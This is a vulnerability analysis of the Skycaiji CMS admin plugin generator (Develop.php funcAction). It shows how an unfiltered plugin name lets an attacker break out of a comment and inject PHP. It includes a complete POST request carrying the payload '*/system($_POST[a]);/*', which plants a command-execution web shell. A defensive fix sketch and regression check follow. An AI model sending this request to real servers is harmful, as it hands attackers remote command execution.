Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()
Code:
```php
...
else{
    $module=input('module');
    $copyright=input('copyright');
    $identifier=input('identifier');
    $name=input('name');
    $methods=input('methods/a',array());
    if(empty($module)){
        $this->error('请选择类型'); // "Please select a type"
    }
    $module=$mfuncApp->format_module($module);
    $copyright=$mfuncApp->format_copyright($copyright);
    $identifier=$mfuncApp->format_identifier($identifier);
    if(!$mfuncApp->right_module($module)){
        $this->error('类型错误'); // "Invalid type"
    }
    if(!$mfuncApp->right_identifier($identifier)){
        // "The function identifier may only contain letters or digits, and the first character must be a letter!"
        $this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!');
    }
    if(!$mfuncApp->right_copyright($copyright)){
        // "The author copyright may only contain letters or digits, and the first character must be a letter!"
        $this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!');
    }
    $newMethods=array();
    foreach ($methods['method'] as $k=>$v){
        if(preg_match('/^[a-z\_]\w*/',$v)){
            foreach ($methods as $mk=>$mv){
                $newMethods[$mk][$k]=$mv[$k];
            }
        }
    }
    $methods=$newMethods;
    unset($newMethods);
    if(empty($methods['method'])){
        $this->error('请添加方法!'); // "Please add a method!"
    }
    $app=$mfuncApp->app_name($copyright,$identifier);
    // $name reaches createApp() without any format_* or right_* check
    $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
    if($id>0){
        $this->success('创建成功','Develop/func?app='.$app); // "Created successfully"
    }else{
        $this->error('创建失败'); // "Creation failed"
    }
}
}
....
```
Vulnerability key code:
```php
$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
```
Following `$mfuncApp->app_name`: it concatenates `$copyright` and `$identifier` directly, then returns the result. Going back to:

```php
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
```

Following `$mfuncApp->createApp`, the parameters `$module,$app,array('name'=>$name,'methods'=>$methods)` are ones we can control. Next, follow:

```php
$funcFile=$this->filename($module,$app);
```

It returns directly after splicing the path together.

Continuing back in the `createApp` function, the variable `$name` is not filtered for `/*` and `*/`. The resulting file path is:

```
/plugin/func/$module/$copyright$identifier.php
```
The exploit is constructed directly here:

```http
POST /index.php?s=/Admin/Develop/func HTTP/1.1
Host: 172.16.49.3:50004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://172.16.49.3:50004
Connection: close
Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df

_usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
```
Check the file.

Visit `/plugin/func/downloadImg/A11B1.php` with the POST body `a=command`.
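A sketch of the fix for the unfiltered `$name`, as an added example that is not code from the project or from this report. It assumes `createApp()` writes the name into a block comment of the generated file (the page does not show that function), and every function name below is hypothetical.

```php
<?php
// Added example, not the project's code; all function names are hypothetical.

// Assumed vulnerable pattern: the display name lands inside a block comment.
function render_header_unsafe(string $name): string
{
    return "<?php\n/* Plugin name: {$name} */\n";
}

// Hardened: allowlist the name, then emit it as a quoted PHP string literal
// rather than comment text, so input cannot alter the token stream.
function render_header_safe(string $name): string
{
    // Letters of any script, digits, space, "_" and "-", 1 to 64 characters.
    if (!preg_match('/\A[\p{L}\p{N} _-]{1,64}\z/u', $name)) {
        throw new InvalidArgumentException('plugin name contains disallowed characters');
    }
    return "<?php\n\$pluginName = " . var_export($name, true) . ";\n";
}

// The method-name pattern quoted on the page has no end anchor, so it only
// checks a prefix; anchoring both ends validates the whole value.
function is_valid_method(string $method): bool
{
    return preg_match('/\A[a-z_]\w*\z/', $method) === 1;
}

// Reports whether generated source contains a bare identifier token with this
// name, i.e. whether the name field stopped being data and became code.
function has_identifier_token(string $source, string $ident): bool
{
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) && $tok[0] === T_STRING && $tok[1] === $ident) {
            return true;
        }
    }
    return false;
}

$fromPage = '*/system($_POST[a]);/*';   // name value from the request on this page
$benign   = 'Image downloader';         // constructed sample
var_dump(has_identifier_token(render_header_unsafe($fromPage), 'system'));
var_dump(has_identifier_token(render_header_safe($benign), 'system'));
var_dump(is_valid_method('a12'), is_valid_method('a12();x')); // constructed samples
try {
    render_header_safe($fromPage);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The tokenizer check also works as a regression test: run it over every file the generator emits and fail the build if a user-supplied field ever produces an identifier token.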